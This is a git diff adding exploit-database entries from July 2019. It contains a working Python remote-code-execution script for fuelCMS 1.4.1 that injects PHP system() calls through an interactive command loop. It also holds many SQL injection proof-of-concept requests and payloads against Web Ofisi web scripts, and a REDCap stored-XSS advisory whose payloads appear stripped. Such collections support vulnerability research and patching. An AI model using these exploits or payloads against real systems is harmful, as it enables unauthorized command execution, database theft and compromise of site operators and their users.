diff --git a/exploits/linux/webapps/47138.py b/exploits/linux/webapps/47138.py new file mode 100755 index 000000000..971baab76 --- /dev/null +++ b/exploits/linux/webapps/47138.py @@ -0,0 +1,34 @@ +# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution +# Date: 2019-07-19 +# Exploit Author: 0xd0ff9 +# Vendor Homepage: https://www.getfuelcms.com/ +# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1 +# Version: <= 1.4.1 +# Tested on: Ubuntu - Apache2 - php5 +# CVE : CVE-2018-16763 + + +import requests +import urllib + +url = "http://127.0.0.1:8881" +def find_nth_overlapping(haystack, needle, n): + start = haystack.find(needle) + while start >= 0 and n > 1: + start = haystack.find(needle, start+1) + n -= 1 + return start + +while 1: + xxxx = raw_input('cmd:') + burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27" + proxy = {"http":"http://127.0.0.1:8080"} + r = requests.get(burp0_url, proxies=proxy) + + html = "" + htmlcharset = r.text.find(html) + + begin = r.text[0:20] + dup = find_nth_overlapping(r.text,begin,2) + + print r.text[0:dup] \ No newline at end of file diff --git a/exploits/linux/webapps/47139.txt b/exploits/linux/webapps/47139.txt new file mode 100644 index 000000000..b8d7f16b9 --- /dev/null +++ b/exploits/linux/webapps/47139.txt @@ -0,0 +1,14 @@ +# Exploit Title: Web Ofisi E-Ticaret 3 - 'a' SQL Injection +# Date: 2019-07-19 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor: https://www.web-ofisi.com/detay/e-ticaret-v3-sanal-pos.html +# Demo Site: http://demobul.net/eticaretv3/ +# Version: v3 +# Tested on: Kali Linux +# CVE: N/A + +----- PoC: SQLi ----- + +Request: http://localhost/[PATH]/ara.html?a= +Vulnerable Parameter: a (GET) +Payload: e%' AND 3*2*1=6 AND '0002ZIf'!='0002ZIf% \ No newline at end of file diff --git a/exploits/linux/webapps/47140.txt b/exploits/linux/webapps/47140.txt new file mode 100644 index 000000000..57c3fdb22 --- /dev/null +++ b/exploits/linux/webapps/47140.txt @@ -0,0 +1,21 @@ +# Exploit Title: Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection +# Date: 2019-07-19 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor: https://www.web-ofisi.com/detay/platinum-e-ticaret-v5.html +# Demo Site: http://demobul.net/eticaretv5/ +# Version: v5 +# Tested on: Kali Linux +# CVE: N/A + +----- PoC 1: SQLi ----- + +Request: http://localhost/[PATH]/arama?kategori=&q= +Vulnerable Parameter: q (GET) +Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z + +----- PoC 2: SQLi ----- + +Request: http://localhost/[PATH]/ajax/productsFilterSearch +Vulnerable Parameter: q (POST) +Payload: +kategori=&pageType=arama&q=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&sayfa=1 \ No newline at end of file diff --git a/exploits/linux/webapps/47141.txt b/exploits/linux/webapps/47141.txt new file mode 100644 index 000000000..d3bf8ec78 --- /dev/null +++ b/exploits/linux/webapps/47141.txt @@ -0,0 +1,14 @@ +# Exploit Title: Web Ofisi Emlak 2 - 'ara' SQL Injection +# Date: 2019-07-19 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor: https://www.web-ofisi.com/detay/emlak-scripti-v2.html +# Demo Site: http://demobul.net/emlakv2/ +# Version: v2 +# Tested on: Kali Linux +# CVE: N/A + +----- PoC: SQLi ----- + +Request: http://localhost/[PATH]/ara.html?ara= +Vulnerable Parameter: ara (GET) +Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z \ No newline at end of file diff --git a/exploits/linux/webapps/47142.txt b/exploits/linux/webapps/47142.txt new file mode 100644 index 000000000..d238692fb --- /dev/null +++ b/exploits/linux/webapps/47142.txt @@ -0,0 +1,50 @@ +# Exploit Title: Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection +# Date: 2019-07-19 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor: https://www.web-ofisi.com/detay/emlak-scripti-v3.html +# Demo Site: http://demobul.net/emlakv3/ +# Version: V2 +# Tested on: Kali Linux +# CVE: N/A + +----- PoC 1: SQLi ----- + +Request: +http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet +Vulnerable Parameter: emlak_durumu (GET) +Payload: -1' OR 3*2*1=6 AND 000744=000744 -- + +----- PoC 2: SQLi ----- + +Request: +http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet +Vulnerable Parameter: emlak_tipi (GET) +Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z + +----- PoC 3: SQLi ----- + +Request: +http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet +Vulnerable Parameter: il (GET) +Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z + +----- PoC 4: SQLi ----- + +Request: +http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet +Vulnerable Parameter: ilce (GET) +Payload: -1' OR 3*2*1=6 AND 000397=000397 -- + +----- PoC 5: SQLi ----- + +Request: +http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet +Vulnerable Parameter: kelime (GET) +Payload: -1' OR 3*2*1=6 AND 000397=000397 -- + +----- PoC 6: SQLi ----- + +Request: +http://localhost/[PATH]/emlak-ara.html?emlak_durumu=0&emlak_tipi=0&il=0&ilce=0&kelime=0&max_fiyat=e&max_metrekare=e&min_fiyat=e&min_metrekare=e&resim=evet&semt=0&video=evet +Vulnerable Parameter: semt (GET) +Payload: -1' OR 3*2*1=6 AND 000531=000531 -- \ No newline at end of file diff --git a/exploits/linux/webapps/47143.txt b/exploits/linux/webapps/47143.txt new file mode 100644 index 000000000..c166342a0 --- /dev/null +++ b/exploits/linux/webapps/47143.txt @@ -0,0 +1,15 @@ +# Exploit Title: Web Ofisi Firma Rehberi 1 - 'il' SQL Injection +# Date: 2019-07-19 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor: https://www.web-ofisi.com/detay/firma-rehberi-scripti-v1.html +# Demo Site: http://demobul.net/firma-rehberi-v1/ +# Version: v1 +# Tested on: Kali Linux +# CVE: N/A + +----- PoC: SQLi ----- + +Request: +http://localhost/[PATH]/firmalar.html?il=0&kat=&kelime=&siralama=yeni +Vulnerable Parameters: il,kelime,kat (GET) +Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z \ No newline at end of file diff --git a/exploits/linux/webapps/47144.txt b/exploits/linux/webapps/47144.txt new file mode 100644 index 000000000..b0f169f23 --- /dev/null +++ b/exploits/linux/webapps/47144.txt @@ -0,0 +1,43 @@ +# Exploit Title: Web Ofisi Rent a Car 3 - 'klima' SQL Injection +# Date: 2019-07-19 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor: https://www.web-ofisi.com/detay/rent-a-car-v3.html +# Demo Site: http://demobul.net/rentacarv3/ +# Version: v3 +# Tested on: Kali Linux +# CVE: N/A + +----- PoC 1: SQLi ----- + +Request: +http://localhost/[PATH]/arac-listesi.html?kategori[]=0&klima[]=1&vites[]=1&yakit[]=1 +Vulnerable Parameter: kategori[] (GET) +Payload: if(now()=sysdate(),sleep(0),0) + +----- PoC 2: SQLi ----- + +Request: +http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1 +Vulnerable Parameter: klima[] (GET) +Payload: 1 AND 3*2*1=6 AND 695=695 + +----- PoC 3: SQLi ----- + +Request: +http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1 +Vulnerable Parameter: vites[] (GET) +Payload: 1 AND 3*2*1=6 AND 499=499 + +----- PoC 4: SQLi ----- + +Request: +http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1 +Vulnerable Parameter: vites[] (GET) +Payload: 1 AND 3*2*1=6 AND 499=499 + +----- PoC 5: SQLi ----- + +Request: +http://localhost/[PATH]/arac-listesi.html?kategori[]=i0&klima[]=1&vites[]=1&yakit[]=1 +Vulnerable Parameter: yakit[] (GET) +Payload: 1 AND 3*2*1=6 AND 602=602 \ No newline at end of file diff --git a/exploits/linux/webapps/47145.txt b/exploits/linux/webapps/47145.txt new file mode 100644 index 000000000..b6da6ab60 --- /dev/null +++ b/exploits/linux/webapps/47145.txt @@ -0,0 +1,13 @@ +# Exploit Title: Web Ofisi Firma 13 - 'oz' SQL Injection +# Date: 2019-07-19 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor: https://www.web-ofisi.com/detay/kurumsal-firma-v13-sinirsiz-dil.html +# Demo Site: http://demobul.net/firmav13/ +# Version: v13 +# Tested on: Kali Linux +# CVE: N/A + +----- PoC: SQLi ----- +Request: http://localhost/[PATH]/kategori/ikinci-el-klima.html?oz[]=1_1 +Vulnerable Parameters: oz[] (GET) +Payload: 0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z \ No newline at end of file diff --git a/exploits/php/webapps/47146.txt b/exploits/php/webapps/47146.txt new file mode 100644 index 000000000..987fbb85b --- /dev/null +++ b/exploits/php/webapps/47146.txt @@ -0,0 +1,60 @@ +# Exploit Title: REDCap < 9.1.2 - Cross-Site Scripting +# Date: 2019-07-19 +# Exploit Author: Dylan GARNAUD & Alexandre ZANNI (https://pwn.by/noraj) - Pentesters from Orange Cyberdefense France +# Vendor Homepage: https://projectredcap.org +# Software Link: https://projectredcap.org +# Version: Redcap 9.x.x before 9.1.2 and 8.x.x before 8.10.2 +# Tested on: 9.1.0 +# CVE: CVE-2019-13029 +# Security advisory: https://gitlab.com/snippets/1874216 + +### Stored XSS n°1 – Project name (found by Dylan GARNAUD) + +Most JavaScript event are blacklisted but not all. As a result we found one event that was not blacklisted and successfully used it. + +- Where? In project name +- Payload: `
` +- Details: Since it is an *onkeypress* event, it is triggered whenever the user touch any key and since the XSS payload is stored in the project name it appears in several pages. +- Privileges: It requires admin privileges to store it. +- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/ProjectSetup/index.php?pid=16&msg=projectmodified + +### Stored XSS n°2 – Calendar (found by Dylan GARNAUD) + +- Where? Calendar event +- Payload: `` +- Privileges: It requires admin privileges to store it. +- Location example: https://redcap.XXX/redcap/redcap_v9.1.0/Calendar/index.php?pid=16&view=week&month=7&year=2019&day=12 + +### Stored XSS n°3 – CSV upload (found by Dylan GARNAUD) + +- Where? Wherever there is a CSV upload feature with displayed parsed results +- Payload: + ```csv + record_id,my_first_instrument_complete,body_onkeypressalertxssinstrumetn_complete + ,, + ``` +- Details: Once the malicious CSV is uploaded, the parsed content is inserted into a HTML table where the XSS will be triggered. +- Privileges: It requires admin privileges to store it. +- URL examples of execution: + + https://redcap.XXX/redcap/redcap_v9.1.0/index.php?pid=16&route=DataComparisonController:index + + https://redcap.XXX/redcap/redcap_v9.1.0/DataQuality/index.php?pid=16 + +### Stored XSS n°4 – Survey queue (found by Alexandre ZANNI) + +- Where? In the Survey Queue (choose a Projet > Project Home and Design > Design > Survey Queue) +- Payload: `